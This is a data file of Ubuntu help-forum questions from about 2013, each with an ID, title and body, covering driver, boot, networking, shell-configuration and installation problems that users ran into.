354430	ubuntu 12.04 wo n't shut down - stopping winbind daemon	my precise pangolin sometimes wo n't shut down - the screen is black with text on it . mostly last line says something like stopping winbind deamon ( sometimes also virtualbox , which is above winbind daemon ; ) edit : sometimes the last line says running unattended updates . and it stays like this for about ten miutes . then i usually hold the power button for more than 5 seconds to shut it down . it 's very unpredictable . sometimes the computer shuts down without problem and sometimes it hangs . i 've tried many ways to shut it down : hw button , panel applet , sudo shutdown -h now , sudo poweroff , sudo halt , etc . even i tried sudo reboot or restart from panel applet . they also have this problem . sometimes it works correctly . but every method named hung at least once on the same ( damned ) line . my specs : fujitsu siemens lifebook e8310 , intel core2 duo t7300 @ 2.00ghz , 3gb ram , gpu : mobile intel ( r ) 965 express chipset family ubuntu 12.04.2 32bit , 3.5.0-41-generic kernel ( but it did it on older kernels and 12.04.x systems too ) . any ideas what should i try next ?
354434	create avd on eclipse null error	i installed openjdk6 , java works normally , i installed eclipse 64bit , android-sdk-linux and extracted it , i set the location of android-sdk but when i try to create an avd , it appears in console : android-sdk-manager null . i ca n't find a solution on the net : /
354437	how can add the line into etc/sudoers file ?	i am getting this error : visudo : > > > /etc/sudoers : syntax error near line 29 < < < visudo : > > > /etc/sudoers.tmp unchanged visudo : > > > /etc/sudoers : syntax error near line 29 < < < i was try to hadoop installation ( how to install hadoop ? ) add at the end the line to add hduser into sudoers file hduser ( all ) = ( all ) all but it not working .
354439	problems with attempting to install drivers . ubuntu 12.04 , realtek	i just recently installed 12.04 lts on my machine . it 's dual boot with windows 7 on the other side.while on windows i have a solid connection with full bars all day long . however , on the ubuntu side , i have 3 out of 4 bars , and the connection is constantly dropping.it only disconnects for a second or two , but in doing so , it disconnects my vpn . so i have to monitor my wifi icon . my machine is toshiba satellite l755 i tried sudo iwconfig wlan0 power off in terminal , but i get this : error for wireless request `` set power management '' ( 8b2c ) : set failed on device wlan0 ; operation not supported . after going to system settings > additional hardware drivers i get `` no proprietary drivers are in use on this system '' when i run sudo lspci and i get these results : family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1c.6 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 7 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a4 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 03:00.0 ethernet controller : qualcomm atheros ar8152 v2.0 fast ethernet ( rev c1 ) so i downloaded latest driver from realtek website , copied to desktop , and extracted it . in terminal i run sudo apt-get install gcc build-essential linux-headers-generic linux-headers- $ ( uname -r ) for necessary dependencies . i then enter cd ~/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 make make install at this point i get a long scroll with a few mentions of error1 and error 2 . i try to reboot the computer with sudo modprobe -v rtl8188ee but it says it can not be found . so i manually reboot , and nothing changes under `` additional drivers '' scan . so i ca n't tell if i 'm not installing correctly , or if there is something else going on . sources i 've used so far : http : //ubuntuforums.org/showthread.php ? t=2162026 step by step ubuntu 12.04 install of realtek rtl8188ce driver here 's what i get after entering cd ~/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 make clean in the terminal : ok. after following the steps in the answer provided by chili555 below , i believe everything went smoothly . it 's worth stating that after entering the sudo modprobe rtl8192ce command , nothing happened . so i rebooted manually . i now have all bars lit up in my wifi icon ( as opposed to before , when i only had 3 ) chili555 put up a text file in the comment section below that shows what it should look like when entering the 4 lines of code in gedit . that was very helpful . also , be mindful of where your directory is when entering a command in terminal for cleaning up download . i specified `` desktop '' because that 's where my extracted zip was located . edit : the next day , well after spending the evening on ubuntu , i found that i am still in the same boat as before . i still have not been able to fix this issue of intermittent disconnects .
354441	free 'radeon ' driver does n't work	i just installed a fresh copy of ubuntu 12.04.3 lts + updates on a pc . i was forced to install it via the 'nomodeset ' option , otherwise the screen would be filled with blinking graphical artifacts . the problem now is : i wish to use the open source 'radeon ' driver , but my system boots directly into the ubuntu 2d interface . i ca n't switch to normal ubuntu . somewhere on the internet i read that the free 'radeon ' driver should work by default out of the box , if it supports my gpu . i checked the list , and my gpu is supported by the driver . my question therefor is : the proprietary driver works fine , but how do i safely activate the open source driver ? my gpu : club 3d amd hd 6570 1gb ddr3
354442	lubuntu ca n't recieve files via bluetooth ( from android phone )	i 'm using lubuntu 13.04 on my laptop ( toshiba satellite l310 ) and i 'm trying to use bluetooth to connect it to my smartphone ( samsung galaxy s4 mini ) i 've installed bluetooth manager and i paired my two devices successfully . i 've send files from my laptop to my phone without any problems , however when i try to send files in my phone to the laptop , it does n't work and i wonder why . what should i do ? p.s . i 've ticked my phone as 'trusted device ' in bluetooth manager but it does n't help thank you
354443	why does sublime forget my session every time ?	every time i close sublime text 2 and reopen it , my project folders are not shown , as are the open files i was using last time . any ideas ?
354445	why such a complicated download ?	i want to use ubuntu as a secondary system , why can not i download directly from your site ? as you know windows 8 causes problems with your basic method.i have ordered a set of disks but it aint free ! and they may not work !
354448	how do i put ubuntu onto usb ?	i have a surface rt ( 32gb ) , and i want to run ubuntu on it from a usb . what do i put on the usb to run this ? where do i get it ?
354450	ubuntu 12.04.3 -32bit failed to install grub-efi to /target/	i made a live usb using a 12.04.3-32 bit iso and trying to install it on intel baytrail , efi based hardware.during installation i get an error `` failed to install grub-efi to /target/.without the grub bootloader , the installed system will not boot '' . here am in a position that i have to use 12.04 lts , can i know the solution for this issue ? note : i can able to install 12.04 - 64bit on the same board successfully . i have overcome from this issue by customizing 32 bit iso file using ubuntu-builder . in that am keeping efi part of the ubuntu-builder file system so during installation my `` efi '' will be copied to the system /boot folder . during installation am getting `` failed to install grub-efi to /target/ . without the grub bootloader , the installed system will not boot '' error then i reboot the system and i can successfully login to installed ubuntu . can i able to suppress this error `` failed to install grub-efi to /target/ . without the grub bootloader , the installed system will not boot '' while installation ?
354454	the system is running in low graphics mode ?	hi there . i 've dual booted my device with windows 8 pro and ubuntu 13.04 i 've done all updates by the following commands : sudo apt-get update sudo apt-get upgrade then i 've installed the additional drivers for my nvidia graphic card to support for it in the additional drivers menu in settings . i 've installed the nvidia driver 310 ( propitiatory , tested ) . but recently when i boot to ubuntu my screen gets into terminal like mode and starts displaying some code lines like : wlan0 : inserted not in use card display mode etc . , lines and no key works when i press the `` enter '' key or the `` power key '' i 'm getting a dialog box like `` the system is running in low graphics mode '' . then no key works nor my mouse , touch pad . but my problem fixed when i reboot it . please any one solve this problem .
354455	ubuntu install on asus uefi network not working	i did a complete wipe of my windows 8 and replaced it with ubuntu ( asus v500ca-bb31t ) . when i boot into ubuntu none of the networking works , not even the ethernet cable is recognized . when installing , i followed this guide mostly . this was the main step i followed to get ubuntu installed : if you just press install option , installation will hang . you need to edit the installation command : press 'e ' to enter on edit mode . replace where it says 'quiet splash ' with 'nomodeset' press ctrl-x to boot and install . i have n't used the new installation much and would be fine with reinstalling .
354461	how to install the drivers for a samsung ml-1670 ?	i have just re-installed ubuntu 12.04 lts via internet but i 'm not able to print anything with my laser printer samsung ml-1670 . where or how i can find and install the proper driver for ubuntu ? ?
354464	how to issue notifications that echo across all open consoles of particular user ?	i 've heard about notify-send of libnotify-bin , but it only seems purposed for gui desktops . is there a simpler counterpart that 's just for consoles ? similar to the warning/notification we get when ubuntu is shutdown or reboot .
354466	asus sometimes hangs after resume from suspend , black screen , no cursor	title says it all . i have ubuntu 12.10 running on an asus g73jh-bst7 . occasionally when i come back from suspend , the system hangs with a black screen , with no cursor . i have no way out of it , only a reboot . details : no mouse movement helps . no hard drive activity . the wifi light never turns back on . display illuminates , but is a black screen . no switching to a virtual console . in retrospect , i have not tried a reisub . this has happened as far back as i 've had the computer ( since the beginning of the year ) , but happens with random occurrences ; the most recent happened just before this posting ; it also happened yesterday ( about 5 suspends between ) , but the one before that happened months before , with most likely over 100 suspends between the two . the problem has occurred both on ac and on battery . the hardware is stock , except for the following modifications : wireless card was a intel 6250 ( wifi + wimax , which i have no use for ) , which i changed to an intel 6235 ( wifi + bluetooth ) the original 750gb hard drive is installed , along with a 500gb hard drive in the second bay . i 'll get specifics if needed . i received the laptop with a broken screen , and i replaced the display . i 'll get specifics if needed . in the past two instances at least , nothing external has been plugged into the laptop . the system almost constantly has it 's wifi active . any suggestions on how to diagnose are welcome .
354470	i ca n't enable rewrite modde for xampp	i create my .htaccess for my site in /opt/lampp/htdocs/ directory and trying to use it to redirect urls but i ca n't enable rewrite mode in xampp and the server keep showing the 404 page i tried to modify httpd.conf in the directory /opt/lampp/etc/ and have these settings : loadmodule rewrite_module modules/mod_rewrite.so < directory / > allowoverride all require all denied < /directory > documentroot `` /opt/lampp/htdocs '' < directory `` /opt/lampp/htdocs '' > # options indexes followsymlinks # xampp options indexes followsymlinks execcgi includes # allowoverride none # since xampp 1.4 : allowoverride all # # controls who can get stuff from this server . # require all granted < /directory > but still i cant use .htaccess plz help . .
354471	ubuntu terminal copy line number n from one file to another	i would like to know is it possible to copy line number 7,8,9 and 17,18 of one text file to another one ? thanks much in advance ! ! !
354472	how do i re-install ubuntu server on separate lvm partition than my data	i have three logical volumes in a single volume group spread across two physical volumes . v1 : root v2 : srv v3 : swap_1 all of ubuntu is on root and all of the data i care about keeping is on srv for various reasons , i 'd like to re-install ubuntu server to get fresh start . how can i replace ubuntu on root without removing my data on srv ? i 'd prefer not to have to copy everything over from the backup , if possible , especially since i might have to do this again in the future ... thanks in advance .
354476	how to make ubuntu use faenza icons ?	i just installed ubuntu 12.04.3 and installed the faenza icons on it . but when i update ubuntu , the icons switch back to the default , and the theme is mixed with classic gnome .
354481	will ubuntu boot if i install on a hard drive that is n't the windows boot disk via wubi ?	i been thinking about to install ubuntu again which wubi . if i install it on my e drive and not the c drive ( windows ) , will it still dual-booting and work ?
354487	my computer crashed after trying to install wine 1.4	there 's more than a week that i tried to install the program wine 1.4 on my asus eee pc and it failed . since then , all that appears after restarting my mini-laptop is the black screen with a cursor _ , or the message : * stopping system v runlevel compatibility [ ok ] * starting what command should i do to return to my computer ? thanks !
354488	how to execute command with keys ?	like a lot of other users , i have problem with the brightness settings on my laptop . but there is xbacklight which works like a charm . how do i bind xbacklight -dec 10 to fn+up ? i have tried to use custom shortcut with no success .
354489	emacs gtk keybindings theme in 13.04	i 'm trying to enable emacs gtk keybindings in a fresh install of ubuntu 13.04 , but it does n't seem to take effect . what i have already tried : enabling it in gnome-tweak-tool executing gconftool-2 -- set /desktop/gnome/interface/gtk_key_theme emacs -- type string executing gsettings set org.gnome.desktop.interface gtk-key-theme `` emacs '' adding gtk-key-theme-name = `` emacs '' to my ~/.gtkrc-2.0 none of those seemed to work . what am i missing ? edit i just realized it 's working for gtk2 apps . so it 's not applying only for gtk3 .
354490	can i copy 2 partitions at a time with sudo dd	i have copied windows from one hard drive to another with sudo dd many times successfully . it was always from a smaller ssd ( 120 gb ) to a at least same sized or bigger ssd . i could always copy the whole drive ( sda to sdb ) . now i would like to copy windows from a hdd to a sdd . my ssd ist only 120 gb while the hdd is 500 gb . obviously i ca n't copy the whole hdd drive as it is too big . therefore i have reduced the size of the windows system partition to 70 gb . the problem is now , that i still ca n't copy the whole drive itself , as it has 105 mb system reserved partition , 70 gb windows system partition and circa 420 gb on a free partition . i would now need to copy sda1 ( system reserved ) and sda2 ( windows partition ) at the same time ( and disregard the rest ) to sdb ( unpartition ssd ) . when i copy a whole ssd drive to another ssd windows is starting perfectly , but how can i copy the proper image ( mbr , system reserverd and windows partition ) from a much bigger hdd to a smaller sdd ? thanks for helping felix
354492	how to insert characters after every line in a file ?	i want to create a script that insert 20 characters following each line in a text file . suppose the file contains the following lines : text ... . text ... . text ... i want to obtain : text ... . -- -- -- ( 20 symbols ) text ... . -- -- -- ( 20 symbols ) text ... -- -- -- ( 20 symbols ) how to do this ?
354493	anyone installed ubuntu 13 on hp pavillion dm4 , radeon hd7470m	this laptop has 2 graphics cards a radeon hd7470m and an intel one . i had trouble with ubuntu 12 and i am wondering if ubuntu 13 works well with the radeon card .
354495	how to send sound using pulseaudio and shairplay to a raspberry pi ?	i 'm trying to use my pi as a wireless audio receiver . i read airplay is a good and easy way to do this , so i installed shairplay on my pi . i can use the connected speakers via my android smartphone with the app airaudio . now i installed paprefs and pulseaudio-module-raop . the airplay is also shown as an audio output device , but there is no sound . can anybody tell me why ubuntu does n't send sound to my pi ?
354496	help , dns problem after installing virtualmin	i 'm new with ubuntu and my english is not so good ( i come from the netherlands ) i do n't know what is wrong , but i did something . when i try to install a webmin package or a third party package i got the following error : failed to lookup ip address for www.webmin.com i did some search on the internet but i ca n't find a solution . from the search on internet i think there is a dns problem . so i hope that someone can help me to solve this problem .
354504	can i safely upgrade ubuntu 12.10 to 13.04 which installed using wubi ?	i installed ubuntu 12.10 using wubi inside of windows 7 . my update manager shows ubuntu 13.04 available . i tried two times to upgrade but it shows some error . any help about this issue ?
354506	accidantly removed sd card - card reader not visible anymore	i thoughtlessly removed my sd card from the slot of the card reader while the sd card was in use in gparted and the disk-utility . after i put it in again , it was not visible anymore . it is the same situation with another sd card . i reopened the disk-utility and the complete card reader does n't appear anymore . i tried to restart the computer but the situation remains the same - the card reader does n't appear in the disk-utility . how can i reactivate it ?
354507	ubuntu server 13.04 installed on gpt ( 3tb ) with efi with full disk encryption doesnt start	my partition looks like this : 1mb unused 256mb `` efi boot '' 500mb /boot ( unencrypted ) 16gb swap encrypted rest / encrypted ( etc . e.g . /home encrypted ) all primary after installation the following error comes : ... cryptosetup : lvm is not available ... see the image as well : https : //www.dropbox.com/sc/huwia204jtipstu/qqdlkoju-n could you please help what do i do wrong ? thanks ! maybe i should also mention , that using the same partitioning with ubuntu desktop installation image the install is fine . so it boots and asks x-times for the password . the reason i need the server image , that i need the mdadm package for raid as well , and for me its easier to create the raid arrays with the server installer menu , rather than in command line . but if i did n't succeed with the server image , and no answers are arriving , i am forced to use the desktop installer + command line for the raid arrays ...
354508	how or where will i find c : \program files ( x86 ) in ubuntu 13.04 ?	how or where will i find c : \program files ( x86 ) in ubuntu 13.04 ? i can not find it . i need it as i have installed a game there and i need to uninstall it . i have already tried to post a similar question here but this was unclear . thanks
354512	ca n't boot into ubuntu touch on nexus 7 ( grouper )	i have been trying to install ubuntu touch on nexus 7 ( grouper , wifi ) for couple days now , and no luck . i am using manual install method ( from this tutorial ) because other automatic tools do n't work . also using ubuntu touch daily pre-installed images . i tried using ubuntu recovery provided with other images , but received error and audodeploy.zip would not install after pushing it to /sdcard/autodeploy.zip e : ca n't open /cache /recovery/ubuntu_command ca n't find autodeploy.zip i have also tried using cwm recovery , but no luck there either . device just get 's stuck on google boot logo . what am i doing wrong ? edit : it looks like /sdcard is actually a link to /data/media/ which seems to get erased every boot .
354515	how to access/delete a folder accidentally named with escaped characters ?	i was setting up a cloud server and saw that i accidentally added a folder named ^ [ [ 4~ ( with escape code ) . i want to see what is inside and if that was just a mistake then remove that directory . however i can not cd nor ls the contents . i tried finding out the escape code so that i could enter a command like cd \x1b [ 30m ; and hope that it would get me in the directory . what if i was to cd or remove by searching for the first directory listed with ls . would that be possible ? because when i do a ls |grep 4 two results come up and one of them is the one i 'm trying to access . either finding out the folder name in escape string or changing the directory to the first directory ls finds might be a solution here . how can i approach this problem ?
354520	12.04.3 -- - dconf editor wo n't show com > canonical > unity option	hi there ( sorry about bad english ) , i want to tweak something in unity , but i ca n't see `` unity '' option in `` dconf editor > com > canonical , i only see indicator , unity-2d and unity-greeter . ubuntu : 12.04.3 gpu : gtx 570 soc
354526	1 hour of battery life lost in 10 seconds	whenever i plug my charger out , the lifespan of my battery suddenly drops from 90 minutes to 30 . by `` suddenly '' i mean it literally takes it around 10-15 seconds at most to drop . my battery is n't new , but it is n't broken either ( lasted 2-2.5 hours unplugged on windows 8 . not much , i know , but it 's not 30 minutes either ) i 've been searching for answers for quite a while now ( even the `` possible answers '' list had quite a few similar topics ) but i did not seem to find a helpful answer . maybe it 's because i 'm bad at searching , maybe it 's because i 'm still slightly freaking out . either way , your guidance would be very helpful . using 13.04 , 64-bit . ps . : i have jupiter and intel graphic drivers for linux installed already . pss : upower dump : device : /org/freedesktop/upower/devices/line_power_ac native-path : /sys/devices/lnxsystm:00/lnxsybus:00/acpi0003:00/power_supply/ac power supply : yes updated : mon oct 7 19:33:49 2013 ( 497 seconds ago ) has history : no has statistics : no line-power online : yes device : /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : dell 4yrjh13 serial : 7732 power supply : yes updated : mon oct 7 19:33:55 2013 ( 491 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : fully-charged energy : 48.6 wh energy-empty : 0 wh energy-full : 48.6 wh energy-full-design : 48.6 wh energy-rate : 0.0108 w voltage : 12.343 v percentage : 100 % capacity : 56.2444 % technology : lithium-ion daemon : daemon-version : 0.9.20 can-suspend : yes can-hibernate : no on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no
354531	unable to open files from windows partition	i installed ubuntu through wubi . i can see that the windows drive is mounted under /host and i can see all of the files , but i am unable to open many of the files properly . simple files like text files and html files look like junk . appears to be an encoding problem to me . has anyone faced the issue and is there a solution ?
354534	how to improve the speed on wifi using ubuntu 12.10 and 13.04 ?	i use a dual boot computer . everything is fine on window but on ubuntu : my wifi got to be really fast but since few weeks , it was really slow than i reinstalled ubuntu 13.04 but it did n't fix the problem . so i tried 12.04 lts , it did n't fix it either . ubuntu detects the wifi like good quality one when i 'm not connected to it , but when i 'm connected to it the quality dropped . i tried all six solutions : speed up slow wifi connection in ubuntu 13.04 except the wicd because i was not able to start wicd after installed it .
354538	wireless card on dell mini 1010 does n't work	i ca n't get the wireless card on my dell mini 1010 to work . i need the driver , but i am unable to access the internet from the dell mini 1010 . i am able to access it with my lenovo , and i have ubuntu 12.04.3 on it as well . so is there a way to download the driver as a file ? that way i can transfer it via a flash drive and then load it through terminal , or something . i wanted to add that i do not have access to a wired connection , hence needing to transfer between computers .
354539	wireless does n't work !	i 've installed ubuntu on my dell vostro and it ca n't find my wireless network . it does n't even try ! it comes up with a message telling me there are additional drivers available for my wireless device but when i try to install them it tells me this ca n't be done ! any clues here ?
354540	going from windows xp to ubuntu 12.04/13.04	i am a windows user planning to convert to ubuntu . i have a few questions : i have several external hard drives with documents ( doc , xls , etc . ) , pictures , music and movies . can i still use those external hard drives on ubuntu without doing anything , or do i have to do anything with the filesystem ? i have some software that i have n't found for ubuntu . if i use wine on ubuntu , will any windows program then run smoothly ? if i decide to dual boot my computer with windows xp and ubuntu , can i access my external hard drives with both systems ?
354543	how do i revert the amd driver to a previous working state ?	i was trying to see if i was using the amd proprietary driver for my card , and i opted to use the amd driver without updates instead of the one with updates . my gui crashed , and now i ca n't get an x-server to start or even get to a terminal that i can revert the drivers . has anyone had this experience that knows what i can do ?
354545	how to access login screen on ubuntu 13.04 with windows remotely	i have two computers , one with windows 8 and one downstairs with ubuntu 13.04 . after a software update i want to access this ubuntu computer from my windows 8 computer over vnc . but it is on the login screen so i cant . is there any way to enable vnc or rdp or anything else on the login screen so i can do things like change the window manager , etc . thanks ! anthony
354546	ubuntu compatibility with gt240 gddr5 series vga cards	after trying different versions of ubuntu , i eventually ended up seeing a blurred colorful screen like a blocked tv channel , in a very smaller scale though , horizontal ; right before starting the installation process . anyway , i finally concluded it is my vga card which is not compatible running it , is it ? because our lap top boots it up flawlessly . if my vga is the thing , is there any fix or workaround ? thanks .
354549	ca n't access local network when connect to pppoe	i am using dsl ( pppoe ) connection in ubuntu . it has two part ( i am not sure ) , when i just connect the cable , system automatically get an ip address started with 172.x.x.x ( dhcp ) . when i connect using username/password ( pppoe ) i get another ip started with 10.x.x.x and can access internet but ca n't access some local ip ( in my lan ) , which are some ftp , media server provided by my isp . i complained about that to my isp but they reply windows is working it 's true , windows 7 is working fine with this settings . i can access internet and local server at the same time . also i use a wifi router ( tp-link tl-wr340g/tl-wr340gd ) which result the same problem . so when i connect cable directly to system and use windows 7 than everything is fine . otherwise problem . similar problem discussed here . edit before connect to pppoe . connect with eth0 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 172.100.0.1 0.0.0.0 ug 0 0 0 eth0 172.100.0.0 0.0.0.0 255.255.0.0 u 1 0 0 eth0 ifconfig eth0 link encap : ethernet hwaddr 74 : d0:2b : d5 : b3:6c inet addr:172.100.5.242 bcast:172.100.255.255 mask:255.255.0.0 inet6 addr : fe80 : :76d0:2bff : fed5 : b36c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38 errors:0 dropped:0 overruns:0 frame:0 tx packets:97 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4975 ( 4.9 kb ) tx bytes:13653 ( 13.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1627 errors:0 dropped:0 overruns:0 frame:0 tx packets:1627 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:126107 ( 126.1 kb ) tx bytes:126107 ( 126.1 kb ) after connect to pppoe . eth0 disconnect automatically . a new interface named ppp0 is listed now . kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.12.44.91 0.0.0.0 ug 0 0 0 ppp0 10.12.44.91 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 ifconfig after connect eth0 link encap : ethernet hwaddr 74 : d0:2b : d5 : b3:6c inet6 addr : fe80 : :76d0:2bff : fed5 : b36c/64 scope : link inet6 addr : 2002 : ac64:154 : c:76d0:2bff : fed5 : b36c/64 scope : global inet6 addr : fec0 : :c:76d0:2bff : fed5 : b36c/64 scope : site up broadcast running multicast mtu:1500 metric:1 rx packets:26582 errors:0 dropped:18 overruns:0 frame:0 tx packets:2340 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2542063 ( 2.5 mb ) tx bytes:244938 ( 244.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4118 errors:0 dropped:0 overruns:0 frame:0 tx packets:4118 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:336759 ( 336.7 kb ) tx bytes:336759 ( 336.7 kb ) ppp0 link encap : point-to-point protocol inet addr:10.12.44.95 p-t-p:10.12.44.91 mask:255.255.255.255 inet6 addr : fe80 : :a536 : c7ae : e079 : d88d/10 scope : link up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:689 errors:0 dropped:0 overruns:0 frame:0 tx packets:744 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:385746 ( 385.7 kb ) tx bytes:75296 ( 75.2 kb ) i used network manager to create network ( dsl connection ) connection type is dual access/russia pppoe
354550	can not mount extended win7 drive with ubuntu ! ! ! help !	i have recently installed ubuntu 13.10 alongside my win7 partition . ubuntu runs fine , no problems there . when using win7 , i used windows partition editor organize an array of older hard disks as one extended drive for additional storage , that now contains all of my media . ubuntu recognizes this drive but when i attempt to mount it , it gives me the error : error mounting /dev/sda1 at /media/liambennett/extended data : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/liambennett/extended data '' ' exited with non-zero exit status 12 : failed to read last sector ( 1963937791 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sda1 ' : invalid argument the device '/dev/sda1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? is there a way to mount this drive with ubuntu ?
354559	can notify-send be used to send pop-up notifications to a windows x server over ssh ?	i 'd like my backup script to issue a notification once it 's done . i run ubuntu as a headless server and login into it using putty on windows . i 've already installed x11-apps and verified xclock and xcalc to run successfully on the windows x server ( xming ) . if this is not possible , which notification system can i use instead ?
354562	ubuntu software center + 'sudo ' not working	i am having problems with the software center and typing sudo into the terminal . i am a very new user , i 'm not sure what is wrong . ubuntu 12.04 when i type in something like sudo apt-get install software-center i get a return with this e : type 'sudo ' is not known on line 57 in source list /etc/apt/sources.list e : the list of sources could not be read . e : unable to locate package software-manager same for sudo apt=get update e : type 'sudo ' is not known on line 57 in source list /etc/apt/sources.list e : the list of sources could not be read . this is very frustrating as i can not find anything exactly like this problem.. now on to my second problem . when i click on the software center , it does n't open . and then i get errors that ubuntu is n't working . and i now have a red circle with a line through it on the top right of my screen next to the mail icon . aidan @ aidan-pc : ~ $ sudo rm -fr /etc/apt/sources.list [ sudo ] password for aidan : aidan @ aidan-pc : ~ $ sudo rm -fr /etc/apt/sources.list aidan @ aidan-pc : ~ $ sudo apt-get update hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en reading package lists ... done aidan @ aidan-pc : ~ $ cat /etc/apt/sources.list cat : /etc/apt/sources.list : no such file or directory it did n't work . i think i deleted it , and now it wo n't let me make a new one .
354573	disable pdf.js and use evince instead	some pdfs render inside firefox . i am very unhappy with that for several reasons . since ubuntu ships with a good , stable and lightweight pdf-viewer , evince , i 'd rather have all pdfs handled by that native viewer instead of the firefox one . i suspect it 's because of either the mine-time , extension , disposition or some combination thereof , but some pdfs open already just fine in evince . others still open in the pdf.js . how can i direct all pdfs to the native , evince , viewer ?
354574	changing shell colors : `` dircolors -b command not found ''	( preface : i 'm brand new to linux . ) problem i 'm trying to change to colors of the file system in the bash shell . i 've altered my .bashrc file according to : http : //ubuntuforums.org/showthread.php ? t=41538 . but on rebooting the shell or sourcing the .bashrc i get the error message : dircolors -b : command not found what have i done wrong ? set-up and so far i 'm running a fresh ubuntu server 13.04 . i 've created a .dir_colors file in my home directory using : dircolors -p > ~/.dircolors i 've then altered my .bashrc to look like this : # enable color support of ls and also add handy aliases if [ `` $ term '' ! = `` dumb '' ] ; then [ -e `` $ home/.dircolors '' ] & & dir_colors= '' $ home/.dircolors '' [ -e `` $ dir_colors '' ] || dir_colors= '' '' eval `` `dircolors -b $ dir_colors` '' alias ls='ls -- color=auto' # alias dir='ls -- color=auto -- format=vertical' # alias vdir='ls -- color=auto -- format=long' fi i also have force_color_prompt enabled edit : printout of < ~/.bashrc grep dircolors | od -t x1 0000000 20 20 20 20 65 76 61 6c 20 22 27 64 69 72 63 6f 0000020 6c 6f 72 73 20 2d 62 20 24 44 49 52 5f 43 4f 4c 0000040 4f 52 53 27 22 0a 0000046 edit : printout of whereis dircolors dircolors : /usr/bin/dircolors /usr/bin/x11/dircolors /usr/share/man/man1/dircolors.1.gz
354576	no wifi , no ethernet port !	just installed ubuntu 10.04 but showing no wireless networks . from what i understand , i probably need to download some additional drivers but the only problem is , i do n't have an ethernet port on my ultra book . i hate this please help !
354580	how to start empathy and steam on different workspace / viewport	the applications empathy and steam should start on different workspaces / viewports . in the tool ccsm there is the configuration option window management -- > place windows -- > fixed window placement -- > windows with fixed viewport here i added configuration settings for pidgin , skype , empathy and steam . however the settings for steam and empathy do not work . they always open on the current workspace / viewport . how can i fix this ?
354582	how to reset/reinstall default drivers ?	is it possible to reset one or all drivers of ubuntu to the state of a fresh install ? i recently started having trouble with some of my hardware and would like to reset them to the state of a fresh install , when they were working fine .
354588	ubuntu 12.04.3 server i386 fail to install kernel	i 've been trying to install ubuntu server 12.04 lts i386 from a cd-rom on a pentium iv 3ghz machine , always with the same problem - it does n't manage to install linux-image-3.8.0-29-generic . i checked the md5 check sum of the iso file and it is ok . i checked the integrity of the cd-rom and it is also ok . the error reported from syslog is transcript below ( it is impossible to copy it from the console by this time ) : errors were encountered while processing : /media/cdrom/pool/main/l/linux-lts-raring/linux-image-3.8.0-29-generic_3.8.0-29.42~precise1_i386.deb sub-process /usr/bin/dpkg returned an error code ( 1 ) reading pagckage lists ... building dependency tree ... linux-headers-generic-lts-raring is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-generic-lts-raring : depends : linux-image-3.8.0-29-generic but it is not going to be installed unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) the suggested solution of apt-get -f install was innocuous , as the system could n't find 'apt-get ' . it also could n't find dpkg . i have previously installed ubuntu 12.04 lts desktop in this same machine with no problems at all . now i would like very much to run the server version , as all i want to do is build a small server . what can i do to solve this problem , please ?
